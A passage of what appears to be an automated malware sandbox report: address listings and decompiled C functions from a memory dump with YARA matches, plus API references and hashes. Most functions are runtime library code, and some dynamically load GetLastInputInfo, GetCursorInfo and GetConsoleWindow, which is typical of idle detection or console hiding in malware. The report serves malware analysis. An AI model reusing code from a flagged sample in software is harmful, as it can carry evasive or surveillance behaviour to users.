                                    0x0043e5f6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043e5f6
                                    0x0043e5eb
                                    0x0043e601
                                    0x0043e606
                                    0x0043e608
                                    0x0043e60d
                                    0x0043e610
                                    0x0043e613
                                    0x0043e616
                                    0x0043e619
                                    0x0043e61b
                                    0x0043e620
                                    0x0043e62a
                                    0x0043e632
                                    0x0043e63a
                                    0x00000000
                                    0x0043e640
                                    0x0043e644
                                    0x0043e691
                                    0x0043e697
                                    0x0043e69a
                                    0x0043e69d
                                    0x0043e69f
                                    0x0043e6a3
                                    0x0043e6a7
                                    0x0043e6a9
                                    0x0043e6ac
                                    0x0043e6b1
                                    0x0043e6a7
                                    0x0043e6b2
                                    0x0043e6b5
                                    0x0043e6b7
                                    0x0043e6b9
                                    0x0043e6bd
                                    0x0043e6be
                                    0x0043e6c0
                                    0x0043e6c3
                                    0x0043e6c8
                                    0x0043e6be
                                    0x0043e6cb
                                    0x0043e6ce
                                    0x0043e6d1
                                    0x0043e6d4
                                    0x0043e6d7
                                    0x0043e6d7
                                    0x0043e646
                                    0x0043e646
                                    0x0043e649
                                    0x0043e64c
                                    0x0043e64e
                                    0x0043e652
                                    0x0043e656
                                    0x0043e658
                                    0x0043e65b
                                    0x0043e660
                                    0x0043e656
                                    0x0043e661
                                    0x0043e666
                                    0x0043e668
                                    0x0043e66d
                                    0x0043e66f
                                    0x0043e672
                                    0x0043e677
                                    0x0043e66d
                                    0x0043e678
                                    0x0043e67c
                                    0x0043e67c
                                    0x0043e67f
                                    0x0043e683
                                    0x0043e686
                                    0x0043e686
                                    0x00000000
                                    0x0043e689
                                    0x00000000
                                    0x0043e63a
                                    0x0043e5fc
                                    0x0043e5fe
                                    0x0043e5fe
                                    0x00000000
                                    0x0043e5fe
                                    0x0043e6de
                                    0x0043e6df
                                    0x0043e6e0
                                    0x0043e6e1
                                    0x0043e6e2
                                    0x0043e6e3
                                    0x0043e6e8
                                    0x0043e6eb
                                    0x0043e6ec
                                    0x0043e6ee
                                    0x0043e6f4
                                    0x0043e6fb
                                    0x0043e6fe
                                    0x0043e701
                                    0x0043e702
                                    0x0043e703
                                    0x0043e706
                                    0x0043e707
                                    0x0043e70a
                                    0x0043e710
                                    0x0043e712
                                    0x0043e737
                                    0x0043e741
                                    0x0043e747
                                    0x0043e749
                                    0x0043e74f
                                    0x0043e751
                                    0x0043e9a4
                                    0x0043e9a5
                                    0x00000000
                                    0x0043e757
                                    0x0043e757
                                    0x0043e75b
                                    0x0043e8c2
                                    0x0043e8c2
                                    0x0043e8d9
                                    0x0043e8de
                                    0x0043e8e1
                                    0x0043e8e3
                                    0x0043e8e9
                                    0x0043e8e9
                                    0x0043e8eb
                                    0x0043e8ee
                                    0x0043e8f0
                                    0x0043e8f6
                                    0x0043e8f6
                                    0x0043e8f8
                                    0x0043e97f
                                    0x0043e97f
                                    0x0043e8fe
                                    0x0043e8fe
                                    0x0043e900
                                    0x0043e906
                                    0x0043e909
                                    0x0043e90c
                                    0x0043e912
                                    0x00000000
                                    0x00000000
                                    0x0043e914
                                    0x0043e918
                                    0x0043e941
                                    0x0043e941
                                    0x0043e943
                                    0x0043e91a
                                    0x0043e91a
                                    0x0043e91e
                                    0x0043e922
                                    0x0043e929
                                    0x0043e92f
                                    0x00000000
                                    0x0043e931
                                    0x0043e931
                                    0x0043e934
                                    0x0043e937
                                    0x0043e93f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043e93f
                                    0x0043e92f
                                    0x0043e94e
                                    0x0043e94e
                                    0x0043e950
                                    0x0043e97e
                                    0x0043e97e
                                    0x00000000
                                    0x0043e952
                                    0x0043e952
                                    0x0043e958
                                    0x0043e959
                                    0x0043e95a
                                    0x0043e95b
                                    0x0043e960
                                    0x0043e966
                                    0x0043e969
                                    0x0043e96b
                                    0x0043e972
                                    0x0043e974
                                    0x0043e976
                                    0x0043e96d
                                    0x0043e96d
                                    0x0043e96e
                                    0x00000000
                                    0x0043e96e
                                    0x0043e96b
                                    0x00000000
                                    0x0043e950
                                    0x0043e947
                                    0x0043e949
                                    0x0043e94c
                                    0x0043e94c
                                    0x00000000
                                    0x0043e94c
                                    0x0043e985
                                    0x0043e985
                                    0x0043e986
                                    0x0043e989
                                    0x0043e98f
                                    0x0043e98f
                                    0x0043e998
                                    0x0043e99a
                                    0x00000000
                                    0x0043e99c
                                    0x0043e99c
                                    0x00000000
                                    0x0043e99c
                                    0x0043e99a
                                    0x00000000
                                    0x0043e761
                                    0x0043e761
                                    0x0043e766
                                    0x00000000
                                    0x0043e76c
                                    0x0043e76c
                                    0x0043e771
                                    0x00000000
                                    0x0043e777
                                    0x0043e777
                                    0x0043e77d
                                    0x0043e782
                                    0x0043e784
                                    0x0043e78b
                                    0x0043e78c
                                    0x0043e78e
                                    0x00000000
                                    0x00000000
                                    0x0043e794
                                    0x0043e794
                                    0x0043e798
                                    0x0043e79e
                                    0x00000000
                                    0x0043e7a4
                                    0x0043e7a6
                                    0x0043e7a7
                                    0x0043e7aa
                                    0x00000000
                                    0x0043e7b0
                                    0x0043e7b0
                                    0x0043e7b6
                                    0x0043e7bb
                                    0x0043e7c5
                                    0x0043e7c9
                                    0x0043e7ce
                                    0x0043e7d1
                                    0x0043e7d3
                                    0x00000000
                                    0x0043e7d5
                                    0x0043e7d5
                                    0x0043e7d7
                                    0x0043e7da
                                    0x0043e7da
                                    0x0043e7dd
                                    0x0043e7e0
                                    0x0043e7e0
                                    0x0043e7eb
                                    0x0043e7ed
                                    0x0043e7ef
                                    0x00000000
                                    0x00000000
                                    0x0043e7ef
                                    0x00000000
                                    0x0043e7f1
                                    0x0043e7f1
                                    0x0043e7f7
                                    0x0043e7fa
                                    0x0043e7fa
                                    0x0043e808
                                    0x0043e811
                                    0x0043e816
                                    0x0043e81c
                                    0x0043e81f
                                    0x0043e820
                                    0x0043e822
                                    0x0043e830
                                    0x0043e830
                                    0x0043e837
                                    0x0043e898
                                    0x00000000
                                    0x0043e839
                                    0x0043e839
                                    0x0043e847
                                    0x0043e84c
                                    0x0043e84f
                                    0x0043e851
                                    0x0043e9c1
                                    0x0043e9c3
                                    0x0043e9c4
                                    0x0043e9c5
                                    0x0043e9c6
                                    0x0043e9c7
                                    0x0043e9c8
                                    0x0043e9cd
                                    0x0043e9d0
                                    0x0043e9d1
                                    0x0043e9e0
                                    0x0043e9e3
                                    0x0043e9e4
                                    0x0043e9e7
                                    0x0043e9eb
                                    0x0043e9ec
                                    0x0043e9ef
                                    0x0043e9ff
                                    0x0043ea0b
                                    0x0043ea22
                                    0x0043ea27
                                    0x0043ea2a
                                    0x0043ea2c
                                    0x0043ea44
                                    0x0043ea44
                                    0x0043ea47
                                    0x0043ea4d
                                    0x0043ea56
                                    0x0043ea58
                                    0x0043ea5b
                                    0x0043ea62
                                    0x0043ea65
                                    0x0043ea6b
                                    0x00000000
                                    0x00000000
                                    0x0043ea6d
                                    0x0043ea71
                                    0x0043ea9a
                                    0x0043ea9a
                                    0x0043ea73
                                    0x0043ea73
                                    0x0043ea77
                                    0x0043ea7b
                                    0x0043ea82
                                    0x0043ea88
                                    0x00000000
                                    0x0043ea8a
                                    0x0043ea8a
                                    0x0043ea8d
                                    0x0043ea90
                                    0x0043ea98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043ea98
                                    0x0043ea88
                                    0x0043eaa7
                                    0x0043eaa7
                                    0x0043eaa9
                                    0x0043eaaf
                                    0x0043eab5
                                    0x0043eab8
                                    0x0043eab8
                                    0x0043eabb
                                    0x0043eabe
                                    0x0043eabe
                                    0x0043eace
                                    0x0043eadc
                                    0x0043eae1
                                    0x0043eae8
                                    0x0043eaea
                                    0x00000000
                                    0x0043eaf0
                                    0x0043eaf6
                                    0x0043eb03
                                    0x0043eb0c
                                    0x0043eb12
                                    0x0043eb1f
                                    0x0043eb26
                                    0x0043eb2b
                                    0x0043eb2e
                                    0x0043eb30
                                    0x0043ed89
                                    0x0043ed8f
                                    0x0043ed90
                                    0x0043ed91
                                    0x0043ed92
                                    0x0043ed93
                                    0x0043ed94
                                    0x0043ed99
                                    0x0043ed9f
                                    0x0043eb36
                                    0x0043eb36
                                    0x0043eb44
                                    0x0043eb47
                                    0x0043eb62
                                    0x0043eb69
                                    0x0043eb6f
                                    0x0043eb75
                                    0x0043eb49
                                    0x0043eb49
                                    0x0043eb51
                                    0x00000000
                                    0x0043eb53
                                    0x0043eb53
                                    0x0043eb59
                                    0x0043eb59
                                    0x0043eb51
                                    0x0043eb7c
                                    0x0043eb7f
                                    0x0043ec9c
                                    0x0043ec9f
                                    0x0043ecac
                                    0x0043ecaf
                                    0x0043ecb7
                                    0x0043ecb7
                                    0x0043eca1
                                    0x0043eca7
                                    0x0043eca7
                                    0x0043eb85
                                    0x0043eb85
                                    0x0043eb8b
                                    0x0043eb93
                                    0x0043eb95
                                    0x0043eb98
                                    0x0043eba1
                                    0x0043ebaa
                                    0x0043ebb0
                                    0x0043ebb3
                                    0x0043ebb5
                                    0x00000000
                                    0x00000000
                                    0x0043ebb7
                                    0x0043ebbd
                                    0x0043ebbe
                                    0x0043ebc9
                                    0x0043ebd1
                                    0x0043ebd9
                                    0x0043ebdc
                                    0x0043ebdf
                                    0x0043ebe5
                                    0x0043ebeb
                                    0x0043ebf1
                                    0x0043ebf7
                                    0x0043ebfa
                                    0x00000000
                                    0x00000000
                                    0x0043ebfc
                                    0x0043ec21
                                    0x0043ec21
                                    0x0043ec24
                                    0x0043ec41
                                    0x0043ec46
                                    0x0043ec49
                                    0x0043ec4b
                                    0x0043ec51
                                    0x0043ec8c
                                    0x0043ec53
                                    0x0043ec53
                                    0x0043ec58
                                    0x0043ec60
                                    0x0043ec61
                                    0x0043ec61
                                    0x0043ec78
                                    0x0043ec7f
                                    0x0043ec82
                                    0x0043ec87
                                    0x0043ec87
                                    0x0043ec92
                                    0x0043ec92
                                    0x0043ec97
                                    0x00000000
                                    0x0043ec97
                                    0x0043ebfe
                                    0x0043ec00
                                    0x0043ec05
                                    0x0043ec0b
                                    0x0043ec14
                                    0x0043ec1d
                                    0x0043ec1d
                                    0x00000000
                                    0x0043ec00
                                    0x0043ecba
                                    0x0043ecc6
                                    0x0043eccc
                                    0x0043eccf
                                    0x0043ecd5
                                    0x0043ecd7
                                    0x0043ed17
                                    0x0043ed1d
                                    0x0043ed24
                                    0x0043ed24
                                    0x0043ed2a
                                    0x0043ed2e
                                    0x00000000
                                    0x0043ed30
                                    0x0043ed34
                                    0x0043ed3d
                                    0x0043ed49
                                    0x0043ed57
                                    0x0043ed5d
                                    0x0043ed60
                                    0x0043ed60
                                    0x0043ed2e
                                    0x0043ed6f
                                    0x0043ed77
                                    0x0043ed80
                                    0x0043ecd9
                                    0x0043ecdf
                                    0x0043ece9
                                    0x0043ecfb
                                    0x0043ed02
                                    0x0043ed0f
                                    0x00000000
                                    0x0043ed0f
                                    0x00000000
                                    0x0043ecd7
                                    0x0043eb30
                                    0x0043eaab
                                    0x00000000
                                    0x0043eaab
                                    0x00000000
                                    0x0043eaa9
                                    0x0043eaa2
                                    0x0043eaa4
                                    0x0043eaa4
                                    0x00000000
                                    0x0043ea2e
                                    0x0043ea2e
                                    0x0043ea2e
                                    0x0043ea30
                                    0x0043ea35
                                    0x0043ea40
                                    0x0043ea40
                                    0x0043e857
                                    0x0043e857
                                    0x0043e85a
                                    0x0043e85f
                                    0x0043e9bc
                                    0x00000000
                                    0x0043e865
                                    0x0043e867
                                    0x0043e86f
                                    0x0043e875
                                    0x0043e876
                                    0x0043e87c
                                    0x0043e87d
                                    0x0043e882
                                    0x0043e885
                                    0x0043e887
                                    0x0043e88d
                                    0x0043e88f
                                    0x0043e890
                                    0x0043e890
                                    0x0043e89e
                                    0x0043e89e
                                    0x0043e8a1
                                    0x0043e8a3
                                    0x0043e8a6
                                    0x0043e8b4
                                    0x0043e8b4
                                    0x0043e99e
                                    0x0043e99e
                                    0x00000000
                                    0x0043e9a0
                                    0x0043e9a0
                                    0x00000000
                                    0x0043e8a8
                                    0x0043e8a8
                                    0x0043e8ab
                                    0x0043e8ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043e8ae
                                    0x0043e8a6
                                    0x0043e85f
                                    0x0043e851
                                    0x0043e824
                                    0x0043e826
                                    0x0043e827
                                    0x0043e82a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043e82a
                                    0x0043e822
                                    0x0043e7aa
                                    0x00000000
                                    0x0043e79e
                                    0x00000000
                                    0x0043e8bb
                                    0x0043e771
                                    0x0043e766
                                    0x0043e75b
                                    0x0043e714
                                    0x0043e714
                                    0x0043e716
                                    0x0043e718
                                    0x0043e719
                                    0x0043e71a
                                    0x0043e71b
                                    0x0043e720
                                    0x0043e9ab
                                    0x0043e9b0
                                    0x0043e9bb
                                    0x0043e9bb
                                    0x0043e712
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    • _free.LIBCMT ref: 0043E65B
                                    • _free.LIBCMT ref: 0043E672
                                    • _free.LIBCMT ref: 0043E691
                                    • _free.LIBCMT ref: 0043E6AC
                                    • _free.LIBCMT ref: 0043E6C3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                                    • Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
                                    • Opcode Fuzzy Hash: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                                    • Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004493AC, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E004493AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x46a00c; // 0xbd45ae92
				_v8 = _t34 ^ _t70;
				L00435507(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return L0042FD1B(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						L00431F00(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					L00430BA0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E0043F98C(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				L00450810();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                    0x004493b4
                                    0x004493bb
                                    0x004493c7
                                    0x004493cc
                                    0x004493d1
                                    0x004493d6
                                    0x004493d9
                                    0x004493db
                                    0x004493db
                                    0x004493e0
                                    0x004493f9
                                    0x004493ff
                                    0x00449404
                                    0x004494a3
                                    0x004494a7
                                    0x004494ac
                                    0x004494ac
                                    0x004494c8
                                    0x004494c8
                                    0x0044940a
                                    0x00449412
                                    0x00449416
                                    0x00449462
                                    0x00449464
                                    0x00449466
                                    0x0044946b
                                    0x00449482
                                    0x0044948a
                                    0x0044949a
                                    0x0044949a
                                    0x0044948a
                                    0x0044949c
                                    0x0044949d
                                    0x00000000
                                    0x004494a2
                                    0x0044941d
                                    0x0044941f
                                    0x00449421
                                    0x00449429
                                    0x00449446
                                    0x00449450
                                    0x00449455
                                    0x00000000
                                    0x00000000
                                    0x00449457
                                    0x0044945d
                                    0x0044945d
                                    0x00000000
                                    0x0044945d
                                    0x0044942d
                                    0x00449431
                                    0x00449436
                                    0x0044943a
                                    0x00000000
                                    0x00000000
                                    0x0044943c
                                    0x00000000

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
                                    • __alloca_probe_16.LIBCMT ref: 00449431
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
                                    • __freea.LIBCMT ref: 0044949D
                                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID:
                                    • API String ID: 313313983-0
                                    • Opcode ID: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                                    • Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
                                    • Opcode Fuzzy Hash: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                                    • Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C119
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                                    • Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
                                    • Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                                    • Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004013AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004013AD() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46c5e4 = _t2;
				return _t2;
			}




                                    0x004013be
                                    0x004013c4
                                    0x004013c9

                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
                                    • GetProcAddress.KERNEL32(00000000), ref: 004013BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                                    • Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
                                    • Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                                    • Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401468() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ca80 = _t2;
				return _t2;
			}




                                    0x00401479
                                    0x0040147f
                                    0x00401484

                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
                                    • GetProcAddress.KERNEL32(00000000), ref: 00401479
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                                    • Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
                                    • Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                                    • Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401485() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x46ca84 = _t2;
				return _t2;
			}




                                    0x00401496
                                    0x0040149c
                                    0x004014a1

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
                                    • GetProcAddress.KERNEL32(00000000), ref: 00401496
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetConsoleWindow$kernel32.dll
                                    • API String ID: 2574300362-100875112
                                    • Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                                    • Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
                                    • Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                                    • Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0045029A, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E0045029A(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = L00445A9E(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = L00445A9E(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = L00445A9E(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(L0043A504()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = L00445A9E(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(L00448718(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(L0043A504())) = 0xd;
							_t30 = E0043A4F1();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E0043F348(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = L0043DB54(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E004451E9(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0043A4F1();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(L0043A504())) = 0xd;
										}
										L23:
										_t38 = L0043A504();
										E004401F5(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							L0043DB54(_t56, _t59, _v12);
							E004401F5(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(L0043A504())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(L0043A504()));
			}
































                                    0x0045029a
                                    0x004502a4
                                    0x004502a7
                                    0x004502ae
                                    0x004502b5
                                    0x004502ba
                                    0x004502bd
                                    0x004502c3
                                    0x004502d6
                                    0x004502dd
                                    0x004502e0
                                    0x004502e2
                                    0x004502e5
                                    0x00000000
                                    0x00000000
                                    0x004502eb
                                    0x004502eb
                                    0x004502ed
                                    0x004502f0
                                    0x004502f2
                                    0x004502f5
                                    0x004503d3
                                    0x004503d3
                                    0x004503d5
                                    0x0045038c
                                    0x00450394
                                    0x0045039e
                                    0x004503a1
                                    0x00450422
                                    0x00450422
                                    0x00450424
                                    0x00000000
                                    0x00450424
                                    0x004503a3
                                    0x004503a8
                                    0x00000000
                                    0x004503a8
                                    0x004503d7
                                    0x004503dd
                                    0x004503e5
                                    0x004503ec
